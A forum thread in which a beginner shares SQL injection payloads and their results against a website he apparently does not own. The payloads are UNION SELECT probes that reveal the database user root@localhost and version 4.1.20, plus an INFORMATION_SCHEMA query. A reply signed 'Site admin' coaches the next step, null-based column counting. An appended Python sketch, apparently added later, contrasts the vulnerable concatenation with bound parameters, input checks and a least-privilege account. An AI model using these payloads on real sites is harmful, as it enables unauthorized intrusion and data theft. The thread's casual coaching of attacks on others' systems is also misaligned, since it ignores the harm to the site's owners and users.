OK, I am fairly new at SQL injection and hacking in general. I have found a website that I believe to be vulnerable, but I am still having some issues. So far this is what I have found:
news.php3?id=-1'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''-1''' at line 1: 1064
news.php3?id=-1' UNION/**/ALL/**/SELECT/**/1,user()/*
root@localhost
news.php3?id=-1' UNION/**/ALL/**/SELECT/**/1,version()/*
4.1.20
So I have figured out that it's possibly vulnerable, the version it's running and the root directory, but I was unsure where to go after that. I read over the tutorial on this website about SQL injection and found and then tried the following:
news.php3?id=-1' OR EXISTS(SELECT * FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='test' AND TABLE_NAME='users') AND ''='
Access denied for user 'host'@'localhost' to database 'INFORMATION_SCHEMA': 1044
If I understood the tutorial correctly, that command is an attempt to figure out the database's name. So naturally I tried changing the name of the database, and I keep receiving the same error. Is this because I am just not getting the name right, or is that error indicating something else?
Damn, it looks like the information schema is blocked; that always makes things harder. You seem to know quite a lot about SQL already. SQL injections are usually all about guesswork. You can start by getting the number of table columns. Start with:
news.php3?id=-1' UNION ALL SELECT null --
Then keep adding nulls, e.g.:
news.php3?id=-1' UNION ALL SELECT null,null --
until you get an error message. When you get the error, you know the previous one was the number of columns the table has. Then we can look at using wildcards (% symbols). I am not a complete expert in this field but I can try.
PS: also check out tutorial #18 on this site.
Site admin
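Added example, not part of the thread or of the site's code: the quoted error near ''-1''' suggests the id value is pasted into a quoted SQL string, and this sketch puts that pattern beside an allow-listed, bound-parameter lookup that also keeps database errors away from the visitor. Python's sqlite3 stands in for the MySQL back end, and the table, function and constant names are assumptions.

```python
import re
import sqlite3

# Input quoted in the thread above, reused unchanged as the test case.
PAGE_INPUT = "-1' UNION ALL SELECT null,null --"

def make_db():
    # Constructed sample data in an in-memory database.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT);
        INSERT INTO news VALUES (1, 'Site launch');
    """)
    return db

def get_news_vulnerable(db, raw_id):
    # Assumed 'before' pattern: the request value becomes part of the SQL text,
    # so a quote in it ends the string literal and the rest is parsed as SQL.
    sql = "SELECT id, title FROM news WHERE id = '" + raw_id + "'"
    return db.execute(sql).fetchall()

def get_news_hardened(db, raw_id):
    # 1) Allow-list: an article id is a short run of ASCII digits, nothing else.
    if not re.fullmatch(r"[0-9]{1,10}", raw_id):
        return []
    try:
        # 2) Bind the value; the driver never parses it as SQL.
        cur = db.execute("SELECT id, title FROM news WHERE id = ?", (int(raw_id),))
        return cur.fetchall()
    except sqlite3.Error:
        # 3) Log server-side and return a generic result; echoing the engine's
        #    message is what exposed the syntax and access errors in the thread.
        return []

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", get_news_vulnerable(db, PAGE_INPUT))  # extra row appended
    print("hardened:  ", get_news_hardened(db, PAGE_INPUT))    # rejected
    print("hardened:  ", get_news_hardened(db, "1"))           # normal lookup
```

The `root@localhost` result in the first post also shows the application connecting as the database superuser; a dedicated account with SELECT on only the tables the page needs limits what any remaining injection can reach.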